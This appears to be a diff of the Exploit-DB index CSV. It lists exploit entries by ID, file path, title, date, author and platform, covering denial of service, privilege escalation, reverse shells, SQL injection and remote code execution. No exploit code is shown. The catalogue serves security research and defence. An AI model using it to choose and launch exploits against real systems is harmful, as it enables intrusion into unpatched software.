10073,exploits/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,dos,windows,21
10077,exploits/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",dos,multiple,389
10078,exploits/osx/dos/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local Buffer Overflow (PoC)",2009-10-02,mu-b,dos,osx,
33476,exploits/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Multiple Vulnerabilities",2010-01-07,anonymous,dos,hardware,
10091,exploits/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",dos,windows,515
10092,exploits/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,dos,windows,
@ -6215,6 +6216,10 @@ id,file,description,date,author,type,platform,port
45984,exploits/multiple/dos/45984.html,"WebKit JIT - Int32/Double Arrays can have Proxy Objects in the Prototype Chains",2018-12-13,"Google Security Research",dos,multiple,
45993,exploits/windows/dos/45993.py,"Angry IP Scanner 3.5.3 - Denial of Service (PoC)",2018-12-14,"Fernando Cruz",dos,windows,
45996,exploits/windows/dos/45996.py,"UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC)",2018-12-14,"Francisco Ramirez",dos,windows,
46001,exploits/windows/dos/46001.html,"Microsoft Windows - 'jscript!JsArrayFunctionHeapSort' Out-of-Bounds Write",2018-12-18,"Google Security Research",dos,windows,
46002,exploits/windows/dos/46002.py,"AnyBurn 4.3 - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
46003,exploits/windows/dos/46003.py,"Exel Password Recovery 8.2.0.0 - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
46004,exploits/windows/dos/46004.py,"MegaPing - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -6376,7 +6381,7 @@ id,file,description,date,author,type,platform,port
741,exploits/linux/local/741.pl,"HTGET 0.9.x - Local Privilege Escalation",2005-01-05,nekd0,local,linux,
744,exploits/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Local Privilege Escalation (1)",2005-01-07,"Paul Starzetz",local,linux,
749,exploits/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Privilege Escalation",2005-01-11,"Cesar Cerrudo",local,windows,
756,exploits/linux/local/756.c,"Exim 4.41 - 'dns_build_reverse' Local",2005-01-15,"Rafael Carrasco",local,linux,
756,exploits/linux/local/756.c,"Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow",2005-01-15,"Rafael Carrasco",local,linux,
758,exploits/osx/local/758.c,"Apple iTunes - Playlist Parsing Local Buffer Overflow",2005-01-16,nemo,local,osx,
760,exploits/windows/local/760.cpp,"Peer2Mail 1.4 - Encrypted Password Dumper",2005-01-16,ATmaCA,local,windows,
763,exploits/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility",2005-01-20,vade79,local,linux,79
@ -6432,7 +6437,7 @@ id,file,description,date,author,type,platform,port
937,exploits/windows/local/937.c,"BitComet 0.57 - Local Proxy Password Disclosure",2005-04-13,Kozan,local,windows,
938,exploits/windows/local/938.cpp,"Microsoft Windows - 'HTA' Script Execution (MS05-016)",2005-04-14,ZwelL,local,windows,
950,exploits/linux/local/950.c,"BitchX 1.0c20 - Local Buffer Overflow",2005-04-21,sk,local,linux,
951,exploits/windows/local/951.py,"Microsoft Jet Database - 'msjet40.dll' Reverse Shell (2)",2005-04-22,"Jean Luc",local,windows,
951,exploits/windows/local/951.py,"Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)",2005-04-22,"Jean Luc",local,windows,
963,exploits/windows/local/963.c,"GoText 1.01 - Local User Informations Disclosure",2005-04-28,Kozan,local,windows,
964,exploits/windows/local/964.c,"FilePocket 1.2 - Local Proxy Password Disclosure",2005-04-28,Kozan,local,windows,
965,exploits/windows/local/965.c,"ICUII 7.0 - Local Password Disclosure",2005-04-28,Kozan,local,windows,
@ -6795,7 +6800,7 @@ id,file,description,date,author,type,platform,port
6333,exploits/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow",2008-08-30,Koshi,local,windows,
6337,exploits/linux/local/6337.sh,"Postfix 2.6-20080814 - 'symlink' Local Privilege Escalation",2008-08-31,RoMaNSoFt,local,linux,
6389,exploits/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow",2008-09-06,"fl0 fl0w",local,windows,
6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local",2008-10-08,"Cesar Cerrudo",local,windows,
6705,exploits/windows/local/6705.txt,"Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation",2008-10-08,"Cesar Cerrudo",local,windows,
6757,exploits/windows/local/6757.txt,"Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",local,windows,
6787,exploits/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Local Stack Buffer Overflow",2008-10-19,"Guido Landi",local,windows,
6798,exploits/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' Local Stack Buffer Overflow",2008-10-21,"Guido Landi",local,windows,
@ -7134,7 +7139,6 @@ id,file,description,date,author,type,platform,port
10060,exploits/linux/local/10060.sh,"Geany .18 - Local File Overwrite",2009-10-06,"Jeremy Brown",local,linux,
10072,exploits/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security",2009-11-12,"Marsh Ray",local,multiple,
10076,exploits/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Privilege Escalation",2009-10-02,mu-b,local,osx,
10078,exploits/osx/local/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local",2009-10-02,mu-b,local,osx,
33426,exploits/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (SEH Unicode)",2014-05-19,"Mike Czumak",local,windows,
10084,exploits/windows/local/10084.txt,"Quick Heal 10.00 SP1 - Local Privilege Escalation",2009-10-13,"Maxim A. Kulakov",local,windows,
10201,exploits/windows/local/10201.pl,"TEKUVA - Password Reminder Authentication Bypass",2009-11-21,iqlusion,local,windows,
@ -10149,6 +10153,7 @@ id,file,description,date,author,type,platform,port
45961,exploits/windows/local/45961.txt,"McAfee True Key - McAfee.TrueKey.Service Privilege Escalation",2018-12-11,"Google Security Research",local,windows,
45985,exploits/windows/local/45985.rb,"CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)",2018-12-13,Metasploit,local,windows,
45988,exploits/windows/local/45988.py,"Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH)",2018-12-14,"Manpreet Singh Kheberi",local,windows,
46005,exploits/windows/local/46005.py,"Nsauditor 3.0.28.0 - Local SEH Buffer Overflow",2018-12-18,Achilles,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -11779,7 +11784,7 @@ id,file,description,date,author,type,platform,port
15371,exploits/windows/remote/15371.txt,"Yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,remote,windows,
15373,exploits/windows/remote/15373.txt,"Mongoose Web Server 2.11 - Directory Traversal",2010-11-01,nitr0us,remote,windows,
15421,exploits/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption",2010-11-04,ryujin,remote,windows,
15423,exploits/android/remote/15423.html,"Google Android 2.0 < 2.1 - Reverse Shell",2010-11-05,"MJ Keith",remote,android,
15423,exploits/android/remote/15423.html,"Google Android 2.0 < 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222/TCP)",2010-11-05,"MJ Keith",remote,android,
15427,exploits/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Directory Traversal",2010-11-05,"Yakir Wizman",remote,windows,
15437,exploits/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Directory Traversal",2010-11-05,"Yakir Wizman",remote,windows,
15438,exploits/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Directory Traversal",2010-11-06,"Yakir Wizman",remote,windows,
@ -17008,6 +17013,7 @@ id,file,description,date,author,type,platform,port
45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization RCE (Metasploit)",2018-12-04,Metasploit,remote,windows,8080
45986,exploits/hardware/remote/45986.py,"Cisco RV110W - Password Disclosure / Command Execution",2018-12-14,RySh,remote,hardware,443
45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,
45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method",2018-12-18,"Rafael Pedrero",remote,windows,80
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40494,3 +40500,4 @@ id,file,description,date,author,type,platform,port
45994,exploits/php/webapps/45994.txt,"Facebook And Google Reviews System For Businesses 1.1 - SQL Injection",2018-12-14,"Ihsan Sencan",webapps,php,
45995,exploits/php/webapps/45995.txt,"Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution",2018-12-14,"Ihsan Sencan",webapps,php,
45997,exploits/php/webapps/45997.txt,"Double Your Bitcoin Script Automatic - Authentication Bypass",2018-12-14,Veyselxan,webapps,php,
46000,exploits/xml/webapps/46000.txt,"SDL Web Content Manager 8.5.0 - XML External Entity Injection",2018-12-18,"Ahmed Elhady Mohamed",webapps,xml,

Can't render this file because it is too large.